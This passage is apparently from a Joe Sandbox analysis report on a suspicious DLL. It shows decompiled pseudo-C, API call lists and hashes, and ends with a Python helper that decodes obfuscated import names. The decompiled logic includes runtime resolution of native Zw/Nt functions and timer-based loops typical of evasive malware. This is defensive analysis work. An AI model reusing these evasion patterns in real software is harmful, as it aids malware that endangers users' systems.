                                      					if(_t138 != 0) {
                                      						goto L13;
                                      					}
                                      					goto L9;
                                      				}
                                      				_t116 =  *_t82(0,  &_v72);
                                      				if(_t116 != 0) {
                                      					goto L33;
                                      				}
                                      				goto L6;
                                      			}
                                      APIs
                                      • RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 04DE7F2E
                                      • LoadLibraryA.KERNEL32(?), ref: 04DE7FAB
                                      • GetLastError.KERNEL32 ref: 04DE7FB7
                                      • RaiseException.KERNEL32(C06D007E,00000000,00000001,?), ref: 04DE7FEA
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                      • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                      • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: ExceptionRaise$ErrorLastLibraryLoad
                                      • String ID: $
                                      • API String ID: 948315288-3993045852
                                      • Opcode ID: 70c8ba00d7957935f6efca398fedea6dc6abbd1192baf7afb5dc7891830cf449
                                      • Instruction ID: 314218e29e571852956348b15429af91fb0caa5c2e78b8f3ac851f4be12f2606
                                      • Opcode Fuzzy Hash: 70c8ba00d7957935f6efca398fedea6dc6abbd1192baf7afb5dc7891830cf449
                                      • Instruction Fuzzy Hash: F3812CB1B006059FDB25EF9AD890AAEB7F5FB48710F11802AF505D7340E775E905CB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph
                                      (rendered graph of basic blocks 4de6b13 through 4de6cda, legend: Executed / Not Executed; the block and edge listing is not reproduced here)
                                      C-Code - Quality: 83%
                                      			E04DE6B13(void* __edx, intOrPtr _a4, intOrPtr _a8) {
                                      				void _v48;
                                      				long _v52;
                                      				struct %anon52 _v60;
                                      				char _v72;
                                      				long _v76;
                                      				void* _v80;
                                      				union _LARGE_INTEGER _v84;
                                      				struct %anon52 _v92;
                                      				void* _v96;
                                      				void* _v100;
                                      				union _LARGE_INTEGER _v104;
                                      				long _v108;
                                      				struct %anon52 _v124;
                                      				long _v128;
                                      				struct %anon52 _t46;
                                      				void* _t51;
                                      				long _t53;
                                      				void* _t54;
                                      				struct %anon52 _t61;
                                      				long _t65;
                                      				struct %anon52 _t66;
                                      				intOrPtr _t68;
                                      				void* _t69;
                                      				void* _t73;
                                      				signed int _t74;
                                      				void* _t76;
                                      				void* _t78;
                                      				void** _t82;
                                      				signed int _t86;
                                      				void* _t89;
                                      
                                      				_t76 = __edx;
                                      				_v52 = 0;
                                      				memset( &_v48, 0, 0x2c);
                                      				_t89 = (_t86 & 0xfffffff8) - 0x54 + 0xc;
                                      				_t46 = CreateWaitableTimerA(0, 1, 0);
                                      				_v60 = _t46;
                                      				if(_t46 == 0) {
                                      					_v92.HighPart = GetLastError();
                                      				} else {
                                      					_push(0xffffffff);
                                      					_push(0xff676980);
                                      					_push(0);
                                      					_push( *0x4dea2e0);
                                      					_v76 = 0;
                                      					_v80 = 0;
                                      					L04DE81CA();
                                      					_v84.LowPart = _t46;
                                      					_v80 = _t76;
                                      					SetWaitableTimer(_v76,  &_v84, 0, 0, 0, 0);
                                      					_t51 =  *0x4dea30c; // 0x2d4
                                      					_v76 = _t51;
                                      					_t53 = WaitForMultipleObjects(2,  &_v80, 0, 0xffffffff);
                                      					_v108 = _t53;
                                      					if(_t53 == 0) {
                                      						if(_a8 != 0) {
                                      							L4:
                                      							 *0x4dea2ec = 5;
                                      						} else {
                                      							_t69 = E04DE67E2(_t76); // executed
                                      							if(_t69 != 0) {
                                      								goto L4;
                                      							}
                                      						}
                                      						_v104.LowPart = 0;
                                      						L6:
                                      						L6:
                                      						if(_v104.LowPart == 1 && ( *0x4dea300 & 0x00000001) == 0) {
                                      							_v104.LowPart = 2;
                                      						}
                                      						_t74 = _v104.LowPart;
                                      						_t58 = _t74 << 4;
                                      						_t78 = _t89 + (_t74 << 4) + 0x38;
                                      						_t75 = _t74 + 1;
                                      						_v92.LowPart = _t74 + 1;
                                      						_t61 = E04DE5803( &_v96, _t75, _t78, _t75, _t89 + _t58 + 0x38, _t78,  &_v100); // executed
                                      						_v124 = _t61;
                                      						if(_t61 != 0) {
                                      							goto L17;
                                      						}
                                      						_t66 = _v92;
                                      						_v104.LowPart = _t66;
                                      						if(_t66 != 3) {
                                      							goto L6;
                                      						} else {
                                      							_t68 = E04DE29F2(_t75,  &_v72, _a4, _a8); // executed
                                      							_v124.HighPart = _t68;
                                      						}
                                      						goto L12;
                                      						L17:
                                      						__eflags = _t61 - 0x10d2;
                                      						if(_t61 != 0x10d2) {
                                      							_push(0xffffffff);
                                      							_push(0xff676980);
                                      							_push(0);
                                      							_push( *0x4dea2e4);
                                      							goto L21;
                                      						} else {
                                      							__eflags =  *0x4dea2e8; // 0x0
                                      							if(__eflags == 0) {
                                      								goto L12;
                                      							} else {
                                      								_t61 = E04DE3F62();
                                      								_push(0xffffffff);
                                      								_push(0xdc3cba00);
                                      								_push(0);
                                      								_push( *0x4dea2e8);
                                      								L21:
                                      								L04DE81CA();
                                      								_v104.LowPart = _t61;
                                      								_v100 = _t78;
                                      								SetWaitableTimer(_v96,  &_v104, 0, 0, 0, 0); // executed
                                      								_t65 = WaitForMultipleObjects(2,  &_v100, 0, 0xffffffff);
                                      								_v128 = _t65;
                                      								__eflags = _t65;
                                      								if(_t65 == 0) {
                                      									goto L6;
                                      								} else {
                                      									goto L12;
                                      								}
                                      							}
                                      						}
                                      						L25:
                                      					}
                                      					L12:
                                      					_t82 =  &_v72;
                                      					_t73 = 3;
                                      					do {
                                      						_t54 =  *_t82;
                                      						if(_t54 != 0) {
                                      							RtlFreeHeap( *0x4dea2d8, 0, _t54); // executed
                                      						}
                                      						_t82 =  &(_t82[4]);
                                      						_t73 = _t73 - 1;
                                      					} while (_t73 != 0);
                                      					CloseHandle(_v80);
                                      				}
                                      				return _v92.HighPart;
                                      				goto L25;
                                      			}

                                      APIs
                                      • memset.NTDLL ref: 04DE6B2D
                                      • CreateWaitableTimerA.KERNEL32(00000000,00000001,00000000), ref: 04DE6B39
                                      • _allmul.NTDLL(00000000,FF676980,000000FF), ref: 04DE6B61
                                      • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000), ref: 04DE6B81
                                      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF,?,?,?,?,?,?,?,?,?,?,04DE2E0E,?), ref: 04DE6B9C
                                      • RtlFreeHeap.NTDLL(00000000,00000000,?,?,?,?,?,?,?,?,?,?,04DE2E0E,?,00000000), ref: 04DE6C43
                                      • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04DE2E0E,?,00000000,?,?), ref: 04DE6C53
                                      • _allmul.NTDLL(00000000,FF676980,000000FF,00000002), ref: 04DE6C8D
                                      • SetWaitableTimer.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,FF676980,000000FF,00000002,?,?,?), ref: 04DE6CA7
                                      • WaitForMultipleObjects.KERNEL32(00000002,?,00000000,000000FF), ref: 04DE6CB3
                                        • Part of subcall function 04DE67E2: StrToIntExW.SHLWAPI(?,00000000,?,?,004F0053,054A93D8,00000000,?,7705F710,00000000,7705F730), ref: 04DE6831
                                        • Part of subcall function 04DE67E2: HeapFree.KERNEL32(00000000,00000000,?,80000001,00000000,00680043,054A9410,?,00000000,30314549,00000014,004F0053,054A93CC), ref: 04DE68CE
                                        • Part of subcall function 04DE67E2: HeapFree.KERNEL32(00000000,?,?,?,?,?,?,?,04DE6BB4), ref: 04DE68E0
                                      • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,?,?,04DE2E0E,?,00000000,?,?), ref: 04DE6CC6
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
• Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: FreeHeapTimerWaitable$MultipleObjectsWait_allmul$CloseCreateErrorHandleLastmemset
                                      • String ID:
                                      • API String ID: 3521023985-0
                                      • Opcode ID: 3853f8adbf0d6188266b73827563153d18f314d5a09d3d2b6bed4211f4023260
                                      • Instruction ID: dca1823b5fee337de514602fe7b95cc27ff6829af79c3947f2e0a3d619dcc06e
                                      • Opcode Fuzzy Hash: 3853f8adbf0d6188266b73827563153d18f314d5a09d3d2b6bed4211f4023260
                                      • Instruction Fuzzy Hash: FB517CB1509320AFD711BF179C44DABBBE8FB84724F804A1AF8A596250D775E904CBA2
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 93%
                                      			E04DE15B9(intOrPtr* __eax, void* __ebx, void* __ecx, void* __edi) {
                                      				void* _t17;
                                      				void* _t18;
                                      				void* _t19;
                                      				void* _t20;
                                      				void* _t21;
                                      				intOrPtr _t24;
                                      				void* _t37;
                                      				void* _t41;
                                      				intOrPtr* _t45;
                                      
                                      				_t41 = __edi;
                                      				_t37 = __ebx;
                                      				_t45 = __eax;
                                      				_t16 =  *((intOrPtr*)(__eax + 0x20));
                                      				if( *((intOrPtr*)(__eax + 0x20)) != 0) {
                                      					E04DE3A6F(_t16, __ecx, 0xea60);
                                      				}
                                      				_t17 =  *(_t45 + 0x18);
                                      				_push(_t37);
                                      				_push(_t41);
                                      				if(_t17 != 0) {
                                      					InternetSetStatusCallback(_t17, 0);
                                      					InternetCloseHandle( *(_t45 + 0x18)); // executed
                                      				}
                                      				_t18 =  *(_t45 + 0x14);
                                      				if(_t18 != 0) {
                                      					InternetSetStatusCallback(_t18, 0);
                                      					InternetCloseHandle( *(_t45 + 0x14));
                                      				}
                                      				_t19 =  *(_t45 + 0x10);
                                      				if(_t19 != 0) {
                                      					InternetSetStatusCallback(_t19, 0);
                                      					InternetCloseHandle( *(_t45 + 0x10));
                                      				}
                                      				_t20 =  *(_t45 + 0x1c);
                                      				if(_t20 != 0) {
                                      					FindCloseChangeNotification(_t20); // executed
                                      				}
                                      				_t21 =  *(_t45 + 0x20);
                                      				if(_t21 != 0) {
                                      					CloseHandle(_t21);
                                      				}
                                      				_t22 =  *((intOrPtr*)(_t45 + 8));
                                      				if( *((intOrPtr*)(_t45 + 8)) != 0) {
                                      					E04DE4C73(_t22);
                                      					 *((intOrPtr*)(_t45 + 8)) = 0;
                                      					 *((intOrPtr*)(_t45 + 0x30)) = 0;
                                      				}
                                      				_t23 =  *((intOrPtr*)(_t45 + 0xc));
                                      				if( *((intOrPtr*)(_t45 + 0xc)) != 0) {
                                      					E04DE4C73(_t23);
                                      				}
                                      				_t24 =  *_t45;
                                      				if(_t24 != 0) {
                                      					_t24 = E04DE4C73(_t24);
                                      				}
                                      				_t46 =  *((intOrPtr*)(_t45 + 4));
                                      				if( *((intOrPtr*)(_t45 + 4)) != 0) {
                                      					return E04DE4C73(_t46);
                                      				}
                                      				return _t24;
                                      			}

                                      APIs
                                      • InternetSetStatusCallback.WININET(?,00000000), ref: 04DE15E7
                                      • InternetCloseHandle.WININET(?), ref: 04DE15EC
                                      • InternetSetStatusCallback.WININET(?,00000000), ref: 04DE15F7
                                      • InternetCloseHandle.WININET(?), ref: 04DE15FC
                                      • InternetSetStatusCallback.WININET(?,00000000), ref: 04DE1607
                                      • InternetCloseHandle.WININET(?), ref: 04DE160C
                                      • FindCloseChangeNotification.KERNEL32(?,00000000,00000102,?,?,04DE53E9,?,?,00000000,00000000,770481D0), ref: 04DE161C
                                      • CloseHandle.KERNEL32(?,00000000,00000102,?,?,04DE53E9,?,?,00000000,00000000,770481D0), ref: 04DE1626
                                        • Part of subcall function 04DE3A6F: WaitForMultipleObjects.KERNEL32(00000002,04DE7B35,00000000,04DE7B35,?,?,?,04DE7B35,0000EA60), ref: 04DE3A8A
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
• Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
• Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: Internet$Close$Handle$CallbackStatus$ChangeFindMultipleNotificationObjectsWait
                                      • String ID:
                                      • API String ID: 2172891992-0
                                      • Opcode ID: 44f18083f14ae67ab3900705553eb14f046d33bd6034487d9a82aa49d926dde8
                                      • Instruction ID: 07ad4ace054b181b09d6cf6686b1852e851c2a3dc9c3f92e02940eead5270adf
                                      • Opcode Fuzzy Hash: 44f18083f14ae67ab3900705553eb14f046d33bd6034487d9a82aa49d926dde8
                                      • Instruction Fuzzy Hash: BF11B776700648ABC630BEABED88C6FB7EAFB442443994D1DE046D3620C735FC458A64
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 57%
                                      			E04DE2C52(signed int __edx) {
                                      				signed int _v8;
                                      				long _v12;
                                      				CHAR* _v16;
                                      				long _v20;
                                      				void* __ebx;
                                      				void* __edi;
                                      				void* __esi;
                                      				void* _t21;
                                      				CHAR* _t22;
                                      				CHAR* _t25;
                                      				intOrPtr _t26;
                                      				void* _t27;
                                      				void* _t31;
                                      				void* _t32;
                                      				CHAR* _t36;
                                      				CHAR* _t42;
                                      				CHAR* _t43;
                                      				CHAR* _t44;
                                      				void* _t49;
                                      				void* _t51;
                                      				signed char _t56;
                                      				intOrPtr _t58;
                                      				signed int _t59;
                                      				void* _t63;
                                      				CHAR* _t67;
                                      				CHAR* _t68;
                                      				char* _t69;
                                      				void* _t70;
                                      
                                      				_t61 = __edx;
                                      				_v20 = 0;
                                      				_v8 = 0;
                                      				_v12 = 0;
                                      				_t21 = E04DE175D();
                                      				if(_t21 != 0) {
                                      					_t59 =  *0x4dea2fc; // 0x4000000a
                                      					_t55 = (_t59 & 0xf0000000) + _t21;
                                      					 *0x4dea2fc = (_t59 & 0xf0000000) + _t21;
                                      				}
                                      				_t22 =  *0x4dea178(0, 2); // executed
                                      				_v16 = _t22;
                                      				if(_t22 == 0 || _t22 == 1 || _t22 == 0x80010106) {
                                      					_t25 = E04DE5765( &_v8,  &_v20); // executed
                                      					_t54 = _t25;
                                      					_t26 =  *0x4dea348; // 0x6bd5a8
                                      					if( *0x4dea2fc > 5) {
                                      						_t8 = _t26 + 0x4deb5cd; // 0x4d283a53
                                      						_t27 = _t8;
                                      					} else {
                                      						_t7 = _t26 + 0x4deb9f5; // 0x44283a44
                                      						_t27 = _t7;
                                      					}
                                      					E04DE3EF8(_t27, _t27);
                                      					_t31 = E04DE5410(_t61,  &_v20,  &_v12); // executed
                                      					if(_t31 == 0) {
                                      						CloseHandle(_v20);
                                      					}
                                      					_t63 = 5;
                                      					if(_t54 != _t63) {
                                      						 *0x4dea310 =  *0x4dea310 ^ 0x81bbe65d;
                                      						_t32 = E04DE4DF6(0x60);
                                      						 *0x4dea3cc = _t32;
                                      						__eflags = _t32;
                                      						if(_t32 == 0) {
                                      							_push(8);
                                      							_pop(0);
                                      						} else {
                                      							memset(_t32, 0, 0x60);
                                      							_t49 =  *0x4dea3cc; // 0x54a95b0
                                      							_t70 = _t70 + 0xc;
                                      							__imp__(_t49 + 0x40);
                                      							_t51 =  *0x4dea3cc; // 0x54a95b0
                                      							 *_t51 = 0x4deb81a;
                                      						}
                                      						_t54 = 0;
                                      						__eflags = 0;
                                      						if(0 == 0) {
                                      							_t36 = RtlAllocateHeap( *0x4dea2d8, 0, 0x43);
                                      							 *0x4dea368 = _t36;
                                      							__eflags = _t36;
                                      							if(_t36 == 0) {
                                      								_push(8);
                                      								_pop(0);
                                      							} else {
                                      								_t56 =  *0x4dea2fc; // 0x4000000a
                                      								_t61 = _t56 & 0x000000ff;
                                      								_t58 =  *0x4dea348; // 0x6bd5a8
                                      								_t13 = _t58 + 0x4deb55a; // 0x697a6f4d
                                      								_t55 = _t13;
                                      								wsprintfA(_t36, _t13, _t56 & 0x000000ff, _t56 & 0x000000ff, 0x4de9287);
                                      							}
                                      							_t54 = 0;
                                      							__eflags = 0;
                                      							if(0 == 0) {
                                      								asm("sbb eax, eax");
                                      								E04DE12D3( ~_v8 &  *0x4dea310, 0x4dea00c); // executed
                                      								_t42 = E04DE475F(0, _t55, _t63, 0x4dea00c); // executed
                                      								_t54 = _t42;
                                      								__eflags = _t54;
                                      								if(_t54 != 0) {
                                      									goto L30;
                                      								}
                                      								_t43 = E04DE21FC(); // executed
                                      								__eflags = _t43;
                                      								if(_t43 != 0) {
                                      									__eflags = _v8;
                                      									_t67 = _v12;
                                      									if(_v8 != 0) {
                                      										L29:
                                      										_t44 = E04DE6B13(_t61, _t67, _v8); // executed
                                      										_t54 = _t44;
                                      										goto L30;
                                      									}
                                      									__eflags = _t67;
                                      									if(__eflags == 0) {
                                      										goto L30;
                                      									}
                                      									_t54 = E04DE4ECB(__eflags,  &(_t67[4]));
                                      									__eflags = _t54;
                                      									if(_t54 == 0) {
                                      										goto L30;
                                      									}
                                      									goto L29;
                                      								}
                                      								_t54 = 8;
                                      							}
                                      						}
                                      					} else {
                                      						_t68 = _v12;
                                      						if(_t68 == 0) {
                                      							L30:
                                      							if(_v16 == 0 || _v16 == 1) {
                                      								 *0x4dea17c(); // executed
                                      							}
                                      							goto L34;
                                      						}
                                      						_t69 =  &(_t68[4]);
                                      						do {
                                      						} while (E04DE3E6C(_t63, _t69, 0, 1) == 0x4c7);
                                      					}
                                      					goto L30;
                                      				} else {
                                      					_t54 = _t22;
                                      					L34:
                                      					return _t54;
                                      				}
                                       			}

                                       Listing address range: 0x04de2c52 - 0x04de2e2c

                                      APIs
                                        • Part of subcall function 04DE175D: GetModuleHandleA.KERNEL32(4C44544E,00000000,04DE2C6A,00000001), ref: 04DE176C
                                      • CloseHandle.KERNEL32(?,?,?,4D283A53,?,?), ref: 04DE2CE7
                                        • Part of subcall function 04DE4DF6: RtlAllocateHeap.NTDLL(00000000,00000000,04DE5522), ref: 04DE4E02
                                      • memset.NTDLL ref: 04DE2D37
                                      • RtlInitializeCriticalSection.NTDLL(054A9570), ref: 04DE2D48
                                        • Part of subcall function 04DE4ECB: memset.NTDLL ref: 04DE4EE5
                                        • Part of subcall function 04DE4ECB: lstrlenW.KERNEL32(00000000,00410025,00000005,?,00000000), ref: 04DE4F2B
                                        • Part of subcall function 04DE4ECB: StrCmpNIW.SHLWAPI(00000000,?,00000000), ref: 04DE4F36
                                      • RtlAllocateHeap.NTDLL(00000000,00000043,00000060), ref: 04DE2D73
                                      • wsprintfA.USER32 ref: 04DE2DA3
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                       • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                       • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                       • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                       • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: AllocateHandleHeapmemset$CloseCriticalInitializeModuleSectionlstrlenwsprintf
                                      • String ID: FNwPq
                                      • API String ID: 4246211962-3591455833
                                      • Opcode ID: ed0270edecb198ae58036c3122546cdd814232529d38f0516eb789f7eb09cf06
                                      • Instruction ID: 6e7162a5644e6f948f93848a5bf47acce7b6d2e29dd71f0c818e7ddec8893703
                                      • Opcode Fuzzy Hash: ed0270edecb198ae58036c3122546cdd814232529d38f0516eb789f7eb09cf06
                                      • Instruction Fuzzy Hash: D451C671B01225ABEB21BBA7DC55B7E37ACFB04B14F0448A5E501EB341E7B4F9408BA0
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Control-flow Graph

                                      C-Code - Quality: 73%
                                      			E04DE2384(void* __eax, void* __ecx) {
                                      				long _v8;
                                      				char _v12;
                                      				void* _v16;
                                      				void* _v28;
                                      				long _v32;
                                      				void _v104;
                                      				char _v108;
                                      				long _t36;
                                      				intOrPtr _t40;
                                      				intOrPtr _t47;
                                      				intOrPtr _t50;
                                      				void* _t58;
                                      				void* _t68;
                                      				intOrPtr* _t70;
                                      				intOrPtr* _t71;
                                      
                                      				_t1 = __eax + 0x14; // 0x74183966
                                      				_t69 =  *_t1;
                                      				_t36 = E04DE74E0(__ecx,  *((intOrPtr*)( *_t1 + 0xc)),  &_v12,  &_v16); // executed
                                      				_v8 = _t36;
                                      				if(_t36 != 0) {
                                      					L12:
                                      					return _v8;
                                      				}
                                      				E04DE799E( *((intOrPtr*)(_t69 + 0xc)),  *((intOrPtr*)(_t69 + 8)), _v12);
                                      				_t40 = _v12(_v12);
                                      				_v8 = _t40;
                                      				if(_t40 == 0 && ( *0x4dea300 & 0x00000001) != 0) {
                                      					_v32 = 0;
                                      					asm("stosd");
                                      					asm("stosd");
                                      					asm("stosd");
                                      					_v108 = 0;
                                      					memset( &_v104, 0, 0x40);
                                      					_t47 =  *0x4dea348; // 0x6bd5a8
                                      					_t18 = _t47 + 0x4deb3e6; // 0x73797325
                                      					_t68 = E04DE50E8(_t18);
                                      					if(_t68 == 0) {
                                      						_v8 = 8;
                                      					} else {
                                      						_t50 =  *0x4dea348; // 0x6bd5a8
                                      						_t19 = _t50 + 0x4deb747; // 0x54a8cef
                                      						_t20 = _t50 + 0x4deb0af; // 0x4e52454b
                                      						_t71 = GetProcAddress(GetModuleHandleA(_t20), _t19);
                                      						if(_t71 == 0) {
                                      							_v8 = 0x7f;
                                      						} else {
                                      							_v108 = 0x44;
                                      							E04DE37E9();
                                      							_t58 =  *_t71(0, _t68, 0, 0, 0, 0x4000000, 0, 0,  &_v108,  &_v32, 0); // executed
                                      							_push(1);
                                      							E04DE37E9();
                                      							if(_t58 == 0) {
                                      								_v8 = GetLastError();
                                      							} else {
                                      								FindCloseChangeNotification(_v28); // executed
                                      								CloseHandle(_v32);
                                      							}
                                      						}
                                      						HeapFree( *0x4dea2d8, 0, _t68);
                                      					}
                                      				}
                                      				_t70 = _v16;
                                      				 *((intOrPtr*)(_t70 + 0x18))( *((intOrPtr*)(_t70 + 0x1c))( *_t70));
                                      				E04DE4C73(_t70);
                                      				goto L12;
                                       			}

                                       Listing address range: 0x04de238c - 0x04de24bb

                                      APIs
                                        • Part of subcall function 04DE74E0: GetModuleHandleA.KERNEL32(4C44544E,00000020,?,74183966,00000000,?,?,?,04DE23A0,?,?,?,?,00000000,00000000), ref: 04DE7505
                                        • Part of subcall function 04DE74E0: GetProcAddress.KERNEL32(00000000,7243775A), ref: 04DE7527
                                        • Part of subcall function 04DE74E0: GetProcAddress.KERNEL32(00000000,614D775A), ref: 04DE753D
                                        • Part of subcall function 04DE74E0: GetProcAddress.KERNEL32(00000000,6E55775A), ref: 04DE7553
                                        • Part of subcall function 04DE74E0: GetProcAddress.KERNEL32(00000000,4E6C7452), ref: 04DE7569
                                        • Part of subcall function 04DE74E0: GetProcAddress.KERNEL32(00000000,6C43775A), ref: 04DE757F
                                      • memset.NTDLL ref: 04DE23EE
                                        • Part of subcall function 04DE50E8: ExpandEnvironmentStringsA.KERNEL32(00000000,00000000,00000000,00000000,74183966,00000000,04DE2407,73797325), ref: 04DE50F9
                                        • Part of subcall function 04DE50E8: ExpandEnvironmentStringsA.KERNEL32(?,00000000,00000000,00000000), ref: 04DE5113
                                      • GetModuleHandleA.KERNEL32(4E52454B,054A8CEF,73797325), ref: 04DE2424
                                      • GetProcAddress.KERNEL32(00000000), ref: 04DE242B
                                      • HeapFree.KERNEL32(00000000,00000000), ref: 04DE2493
                                        • Part of subcall function 04DE37E9: GetProcAddress.KERNEL32(36776F57,04DE3ECD), ref: 04DE3804
                                      • FindCloseChangeNotification.KERNEL32(00000000,00000001), ref: 04DE2470
                                      • CloseHandle.KERNEL32(?), ref: 04DE2475
                                      • GetLastError.KERNEL32(00000001), ref: 04DE2479
                                      Memory Dump Source
                                      • Source File: 00000003.00000002.569041857.0000000004DE1000.00000020.10000000.00040000.00000000.sdmp, Offset: 04DE0000, based on PE: true
                                       • Associated: 00000003.00000002.569021916.0000000004DE0000.00000004.10000000.00040000.00000000.sdmp
                                       • Associated: 00000003.00000002.569059162.0000000004DE9000.00000002.10000000.00040000.00000000.sdmp
                                       • Associated: 00000003.00000002.569071380.0000000004DEA000.00000004.10000000.00040000.00000000.sdmp
                                       • Associated: 00000003.00000002.569085725.0000000004DEC000.00000002.10000000.00040000.00000000.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_3_2_4de0000_rundll32.jbxd
                                      Similarity
                                      • API ID: AddressProc$Handle$CloseEnvironmentExpandModuleStrings$ChangeErrorFindFreeHeapLastNotificationmemset
                                      • String ID:
                                      • API String ID: 186216982-0
                                      • Opcode ID: a62a0961dddc34bb577f75dbd2d131bb7258e452ef1006de7ad1913185d5af96
                                      • Instruction ID: 524b0946ec5101644b2f89d6f7aac64af95838b842d34f1efa350850782efbd8
                                      • Opcode Fuzzy Hash: a62a0961dddc34bb577f75dbd2d131bb7258e452ef1006de7ad1913185d5af96
                                      • Instruction Fuzzy Hash: DA312FB2900209AFDB10FFE6DC98DAEBBBCEB04358F1044A5E646A7211D735BD45DB60
                                      Uniqueness

                                      Uniqueness Score: -1.00%
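The APIs lists in this report print every argument as a 32-bit value. When the argument is a pointer to a string, the value shown is the first four bytes of that string read as a little-endian DWORD (compare GetModuleHandleA(4C44544E) at 04DE7505 with the module name NTDLL, or GetModuleHandleA(4E52454B) at 04DE2424 with KERNEL32). Byte-swapping those values back into ASCII is how an analyst reads the obfuscated import resolution in E04DE74E0 and E04DE2384 without a debugger. The decoder below is an added example, not code from the sample or from the Joe Sandbox report; the values in REPORT_ARGS are copied from the APIs lists on this page, and the "native API" grouping is the example's own heuristic (a GetProcAddress argument that starts with Zw or Nt means the sample is resolving ntdll syscall stubs directly rather than calling through kernel32).

```python
"""
Decode the DWORD-as-string-prefix arguments that the sandbox prints in its APIs lists.
Added example; REPORT_ARGS values are copied from the report, everything else is ours.
"""
import string
import struct
from typing import Dict, List, Optional

# Argument values exactly as printed in the APIs lists above (function @ call site).
REPORT_ARGS: Dict[str, int] = {
    "GetModuleHandleA @ 04DE7505": 0x4C44544E,          # module name passed to GetModuleHandleA
    "GetProcAddress @ 04DE7527": 0x7243775A,            # names resolved by E04DE74E0 ...
    "GetProcAddress @ 04DE753D": 0x614D775A,
    "GetProcAddress @ 04DE7553": 0x6E55775A,
    "GetProcAddress @ 04DE7569": 0x4E6C7452,
    "GetProcAddress @ 04DE757F": 0x6C43775A,
    "GetModuleHandleA @ 04DE2424": 0x4E52454B,          # module name used in E04DE2384
    "ExpandEnvironmentStringsA @ 04DE50F9": 0x73797325, # string expanded by E04DE50E8
    "GetProcAddress @ 04DE3804": 0x36776F57,            # name resolved by E04DE37E9
    "lstrlen @ 04DE3764": 0x253D7325,                   # format string built in E04DE3739
    "CloseHandle @ 04DE2CE7": 0x4D283A53,               # stale stack value at 04DE2CE7
    "E04DE2384 __eax+0x14": 0x74183966,                 # a pointer, not a string (listing comment)
}

# Printable ASCII without control characters; a prefix must be entirely printable to count.
PRINTABLE = set(string.printable) - set("\t\n\r\x0b\x0c")


def dword_to_prefix(value: int) -> Optional[str]:
    """Reinterpret a 32-bit value as the four bytes it occupies in little-endian memory.

    Returns the 4-character ASCII prefix, or None when any byte is not printable
    (which is the usual sign that the argument was a handle or pointer, not a string).
    """
    raw = struct.pack("<I", value & 0xFFFFFFFF)
    text = raw.decode("latin-1")
    return text if all(c in PRINTABLE for c in text) else None


def decode_report_args(args: Dict[str, int]) -> Dict[str, Optional[str]]:
    """Decode every listed argument; non-string values come back as None."""
    return {site: dword_to_prefix(value) for site, value in args.items()}


def native_api_prefixes(args: Dict[str, int]) -> List[str]:
    """Prefixes of GetProcAddress arguments that name ntdll native stubs (Zw*/Nt*), in listing order."""
    hits = []
    for site, value in args.items():
        prefix = dword_to_prefix(value)
        if site.startswith("GetProcAddress") and prefix and prefix[:2] in ("Zw", "Nt"):
            hits.append(prefix)
    return hits


if __name__ == "__main__":
    for site, prefix in decode_report_args(REPORT_ARGS).items():
        print(f"{site:40s} {prefix!r}")
    print("native API stubs resolved:", native_api_prefixes(REPORT_ARGS))
```

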